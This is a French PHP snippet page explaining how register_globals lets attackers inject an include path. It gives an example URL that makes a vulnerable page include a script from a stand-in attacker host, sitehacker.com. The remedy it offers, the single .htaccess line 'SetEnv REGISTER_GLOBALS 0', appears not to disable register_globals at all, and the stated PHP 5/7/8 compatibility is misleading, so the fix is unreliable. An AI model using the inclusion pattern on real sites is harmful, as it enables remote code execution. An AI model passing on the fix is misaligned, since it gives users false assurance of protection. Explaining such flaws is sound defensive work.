Protection contre les attaques de hacker avec register global on

  Information

Les hackers exploitent souvent la facilité qui consiste à définir les variables GET ou POST en variables globales. Par exemple la variable $_GET['var1'] est également accessible par $var1. Le cas le plus fréquent d'exploitation est l'utilisation d'une variable préfixant le chemin des includes comme :
include($prefix_path . '/chemin_d_include.php');
Ainsi l'appel de l'url http://www.example.com/page.php?prefix_path=http://sitehacker.com/script.txt peut permettre de faire exécuter l'include externe http://sitehacker.com/script.txt/chemin_d_include.php.
La désactivation de cette option nécessite de contrôler tous le code pour toujours accéder aux variables avec les tableaux $_ENV, $_GET, $_POST, $_REQUEST, $_COOKIE et $_SERVER et non directement avec leur nom. Pour plus d'informations vous pouvez lire l'explication détaillée ici.
Pour éviter cette faille, il suffit de désactiver l'enregistrement global avec cette règle dans le fichier .htaccess.
  code source classé dans  .HTACCESS

 
 01    
 02    
 03    
 04    
 05    
 06    
 07    
 08    
 09    
 
                               

                            
/*---------------------------------------------------------------*/
/*
    Titre : Protection contre les attaques de hacker avec register global on                                              
                                                                                                                          
    URL   : https://phpsources.net/code_s.php?id=789
    Date édition     : 22 Juin 2008                                                                                      
*/
/*---------------------------------------------------------------*/
SetEnv REGISTER_GLOBALS 0

   Un petit merci aux auteurs pour leur travail, ça ne coûte rien et ça fait toujours plaisir wink

[3]

  • avatar

    Creasite

    19 Aout 2018 à 23:54

    je vais essayer ce script
     

  • avatar

    Benji54

    11 Aout 2018 à 17:06

     Merci beaucoup

  • avatar

    AnaisJessy

    04 Oct 2016 à 23:17

     Merci beaucoup pour script, je suis éditrice d'un site internet et très souvent je me fait attaqué mon site web...


 Autres snippets qui pourraient vous intéressez

25 Fév 2007

Passer les informations a une variable global depuis une classe - PHP Sources

Compatibilité : PHP 5, PHP 7, PHP 8

Accéder aux informations de vos variables globales depuis une classe.

24 Sept 2019  

22 Juin 2008 

Connexion + sécurité contre le vol de cookies + bruteforce

Compatibilité : PHP 5, PHP 7, PHP 8

Le but de cette classe est de protéger vos utilisateurs du vol de cookie online, en introduisant leur IP publique dans le hash du cookie.

17 Mai 2008

Astuce trés simple contre le spam - PHP Sources

Compatibilité : PHP 5, PHP 7, PHP 8

On sait que les robots pollue le web avec le spam en alimentant de manière automatique les formulaires de contacts par exemple.

11 Aout 2019  

22 Juin 2008 

Tag cloud PHP avec démo en ligne

Compatibilité : PHP 5, PHP 7, PHP 8

Tag Cloud Mysqli - Actualisé pour passer sur tous les sites web. Démo en ligne disponible. Explication du code. Support.

26 Sept 2019  

22 Juin 2008 

Lecture d'un fichier XML avec un parseur PHP

Compatibilité : PHP 5, PHP 7, PHP 8

Code simple qui vous aidera à la lecture d'un fichier XML. Vous y trouverez un exemple réduit d'un fichier XML et le parseur qui sert à lire le fichier

* Requêtes exécutées avec Recherche Contextuelle

  Derniers scripts PHP / MySQL

TwitterOAuth PHP Library pour API REST de Twitter 8.1.1

Script PHP / MySQL
Langue langue en
Date 08 Fév 2026
Taille 0.03 Mo
Catégorie Social-network

DokuWiki 2025-05-14b

logo DokuWiki
Langue langue en
Date 07 Fév 2026
Taille 4 Mo
Catégorie Wiki

WordPress 6.4.1

logo WordPress
Langue langue fr
Date 05 Fév 2026
Taille 34 Mo
Catégorie Blogs

PrestaShop 9.0.2-2.1

logo PrestaShop
Langue langue fr
Date 02 Fév 2026
Taille 116 Mo
Catégorie Ecommerce

  22 Juin 2008

  SOURCE
22 861 Vues
Compatibilité du code
PHP 5, 7 et 8+
58 codes

Catégorie :  .HTACCESS

Ajouter un logo en filigrane sur vos images et vos photos
Anti spam à partir des urls qui spamment
Appliquer une condition à plusieurs règles de réécriture
Augmenter les performances avec AllowOverride
Autoriser l'accès qu'a certaines extensions
Blocage d'une adresse IP avec le fichier .htaccess
Bloquer des sites qui spam - version php et .htaccess
Bloquer l'accès à certaines extensions de fichier
Bloquer les user agent (navigateur) indésirables
Comment mettre du code php avec une extension html
Compression automatique des pages
Corriger automatiquement les petites erreurs de saisie des urls
Définir le charset par défaut
Désactiver l'option MultiViews : une url est accessible avec et sans extension
Déplacer une arborescence sur une autre url
Désactiver la signature du serveur
Empêche une réécriture de boucler
Empêcher l'accès avec www.
Eviter de recharger des pages statiques en indiquant une expiration dans 100 ans
Faire une réécriture ou une redirection que si la requête ne correspond pas à un répertoire existant
Faire une réécriture ou une redirection que si le fichier n'existe pas
Faire une réécriture ou une redirection que si le fichier existe
Force la redirection en HTTPS
Forcer l'accès en français si aucune langue n'est sélectionnée
Forcer la redirection de index.html vers /
Gérer l'accès au site selon l'heure
Gestion de cache par fichier .htaccess
Interdire l'accès à un répertoire sans fichier index
Interdire l'affichage de vos images sur un autre site
Maitriser l'affichage du contenu du répertoire en cas d'absence d'index
Mettre les images, flash,... en cache plus longtemps
Modifier le type MIME (Content-Type) pour un flux rss
Obliger l'accès avec index.php et rediriger l'accès par /
Protéger un répertoire avec un mot de passe chez FREE
Protection contre les attaques de hacker avec register global on
Protection d'un répertoire avec un mot de passe
Réécrire des sous-domaines vers le domaine principal avec une variable
Réécriture de sous-domaine vers un répertoire du domaine principal
Règle de réécriture avec plus de 9 paramètres
Réécriture si la requete ne correspond pas à 1 répertoire
Recevoir un mail quand vos photos sont affichées sur un site inconnu
Redirection d'un ancien nom de domaine vers un nouveau nom de domaine
Redirection d'un répertoire vers un sous domaine
Redirection d'une arborescence vers une page unique
Redirection https vers http ou http vers https, redirection page sécurisée SSL/TLS
Redirection massive avec le sous domaine (www)
Redirection pour une maintenance de votre site
Redirige tout un repertoire d'un domaine principale vers un sous-domaine
Rediriger la racine d'un site vers un répertoire
Rediriger tout en gardant l'url d'origine
Rediriger tout un répertoire vers la racine
Rediriger un domaine vers un autre et suivre dans Google analytics
Rediriger une page vers une url contenant la date du jour
Referrer bloquer le spam
Renommer l'url et les paramètres avec une redirection 301
Substituer vos images si elles sont affichées sur un autre site
Tester les réécritures d'url en local sur un PC avec WampServer
Tracking des liens du bouton J'aime de Facebook dans Analytics